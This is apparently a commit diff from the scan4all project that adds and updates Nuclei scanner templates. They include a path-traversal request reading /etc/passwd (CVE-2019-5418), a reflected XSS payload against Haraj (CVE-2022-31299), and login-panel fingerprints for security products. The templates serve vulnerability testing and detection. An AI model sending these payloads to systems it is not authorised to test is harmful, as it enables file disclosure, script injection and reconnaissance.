crash.software
Projects
Pull Requests
Issues
Builds
scan4all
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY scan4all Commits ce9bf55e
🤬
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2019/CVE-2019-5418.yaml
    skipped 19 lines
    20 20   - method: GET
    21 21   path:
    22 22   - "{{BaseURL}}"
     23 + 
    23 24   headers:
    24 25   Accept: ../../../../../../../../etc/passwd{{
     26 + 
    25 27   matchers-condition: and
    26 28   matchers:
    27 29   - type: status
    28 30   status:
    29 31   - 200
     32 + - 500
     33 + 
    30 34   - type: regex
     35 + part: body
    31 36   regex:
    32 37   - "root:.*:0:0:"
    33  - part: body
    34 38   
    35 39  # Enhanced by mp on 2022/04/12
    36 40   
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-29548.yaml
    skipped 17 lines
    18 18   metadata:
    19 19   google-query: inurl:"carbon/admin/login"
    20 20   verified: "true"
    21  - tags: cve,cve2022,wso2,xss
     21 + tags: cve,cve2022,wso2,xss,packetstorm
    22 22   
    23 23  requests:
    24 24   - method: GET
    skipped 21 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-31299.yaml
     1 +id: CVE-2022-31299
     2 + 
     3 +info:
     4 + name: Haraj v3.7 - Cross Site Scripting
     5 + author: edoardottt
     6 + severity: medium
     7 + description: |
     8 + Haraj v3.7 was discovered to contain a reflected cross-site scripting (XSS) vulnerability in the User Upgrade Form.
     9 + reference:
     10 + - https://github.com/bigzooooz/CVE-2022-31299
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2022-31299
     12 + - https://angtech.org
     13 + classification:
     14 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     15 + cvss-score: 6.1
     16 + cve-id: CVE-2022-31299
     17 + cwe-id: CWE-79
     18 + metadata:
     19 + verified: "true"
     20 + tags: cve,cve2022,haraj,xss
     21 + 
     22 +requests:
     23 + - method: GET
     24 + path:
     25 + - "{{BaseURL}}/payform.php?type=upgrade&upgradeid=1&upgradegd=6&price=123&t=1&note=%3C/textarea%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
     26 + 
     27 + matchers-condition: and
     28 + matchers:
     29 + - type: word
     30 + part: body
     31 + words:
     32 + - '><script>alert(document.domain)</script></textarea>'
     33 + - 'content="nextHaraj'
     34 + condition: and
     35 + 
     36 + - type: word
     37 + part: header
     38 + words:
     39 + - "text/html"
     40 + 
     41 + - type: status
     42 + status:
     43 + - 200
     44 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-35413.yaml
    skipped 10 lines
    11 11   - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35413
    12 12   - https://azuremarketplace.microsoft.com/en/marketplace/apps/penta-security-systems-inc.wapples_sa_v6?tab=Overview
    13 13   classification:
     14 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     15 + cvss-score: 9.8
    14 16   cve-id: CVE-2022-35413
     17 + cwe-id: CWE-798
    15 18   metadata:
    16 19   shodan-query: http.title:"Intelligent WAPPLES"
    17 20   verified: "true"
    skipped 36 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-40734.yaml
    skipped 2 lines
    3 3  info:
    4 4   name: UniSharp aka Laravel Filemanager v2.5.1 - Directory Traversal
    5 5   author: arafatansari
    6  - severity: high
     6 + severity: medium
    7 7   description: |
    8 8   UniSharp laravel-filemanager (aka Laravel Filemanager) through 2.5.1 allows download?working_dir=%2F.. directory traversal to read arbitrary files.
    9 9   reference:
    10 10   - https://github.com/UniSharp/laravel-filemanager/issues/1150
    11 11   - https://nvd.nist.gov/vuln/detail/CVE-2022-40734
    12 12   classification:
     13 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
     14 + cvss-score: 6.5
    13 15   cve-id: CVE-2022-40734
     16 + cwe-id: CWE-22
    14 17   metadata:
    15  - verified: true
    16 18   shodan-query: http.html:"Laravel Filemanager"
     19 + verified: "true"
    17 20   tags: cve,cve2022,laravel,unisharp,lfi,traversal
    18 21   
    19 22  requests:
    skipped 11 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/bitdefender-gravityzone.yaml
     1 +id: bitdefender-gravityzone
     2 + 
     3 +info:
     4 + name: Bitdefender GravityZone
     5 + author: DhiyaneshDK
     6 + severity: info
     7 + metadata:
     8 + verified: true
     9 + shodan-query: title:"Bitdefender GravityZone"
     10 + tags: panel,bitdefender
     11 + 
     12 +requests:
     13 + - method: GET
     14 + path:
     15 + - "{{BaseURL}}"
     16 + 
     17 + matchers-condition: and
     18 + matchers:
     19 + - type: word
     20 + part: body
     21 + words:
     22 + - '<title>Bitdefender GravityZone</title>'
     23 + 
     24 + - type: status
     25 + status:
     26 + - 200
     27 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/darktrace-threat-visualizer.yaml
     1 +id: darktrace-threat-visualizer
     2 + 
     3 +info:
     4 + name: Darktrace Threat Visualizer
     5 + author: DhiyaneshDK
     6 + severity: info
     7 + metadata:
     8 + verified: true
     9 + shodan-query: html:"Darktrace Threat Visualizer"
     10 + tags: panel,darktrace
     11 + 
     12 +requests:
     13 + - method: GET
     14 + path:
     15 + - "{{BaseURL}}/login"
     16 + 
     17 + matchers-condition: and
     18 + matchers:
     19 + - type: word
     20 + part: body
     21 + words:
     22 + - '<title>Login | Darktrace Threat Visualizer</title>'
     23 + 
     24 + - type: status
     25 + status:
     26 + - 200
     27 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/datadog-login.yaml
     1 +id: datadog-login
     2 + 
     3 +info:
     4 + name: Datadog Login Panel
     5 + author: DhiyaneshDK
     6 + severity: info
     7 + metadata:
     8 + verified: true
     9 + shodan-query: title:"Datadog"
     10 + tags: panel,datadog
     11 + 
     12 +requests:
     13 + - method: GET
     14 + path:
     15 + - "{{BaseURL}}/account/login"
     16 + 
     17 + matchers-condition: and
     18 + matchers:
     19 + - type: word
     20 + part: body
     21 + words:
     22 + - '<title>Datadog: Log In</title>'
     23 + 
     24 + - type: status
     25 + status:
     26 + - 200
     27 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/sentinelone-console.yaml
     1 +id: sentinelone-console
     2 + 
     3 +info:
     4 + name: SentinelOne - Management Console
     5 + author: DhiyaneshDK
     6 + severity: info
     7 + metadata:
     8 + verified: true
     9 + shodan-query: title:"SentinelOne - Management Console"
     10 + tags: panel,sentinelone
     11 + 
     12 +requests:
     13 + - method: GET
     14 + path:
     15 + - "{{BaseURL}}/login"
     16 + 
     17 + matchers-condition: and
     18 + matchers:
     19 + - type: word
     20 + part: body
     21 + words:
     22 + - 'SentinelOne - Management Console'
     23 + 
     24 + - type: status
     25 + status:
     26 + - 200
     27 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/webroot-login.yaml
     1 +id: webroot-login
     2 + 
     3 +info:
     4 + name: Webroot - Login
     5 + author: DhiyaneshDK
     6 + severity: info
     7 + metadata:
     8 + verified: true
     9 + shodan-query: title:"Webroot - Login"
     10 + tags: panel,webroot
     11 + 
     12 +requests:
     13 + - method: GET
     14 + path:
     15 + - "{{BaseURL}}/Login"
     16 + 
     17 + matchers-condition: and
     18 + matchers:
     19 + - type: word
     20 + part: body
     21 + words:
     22 + - '<title>Webroot - Login</title>'
     23 + 
     24 + - type: status
     25 + status:
     26 + - 200
     27 + 
Please wait...
Page is in error, reload to recover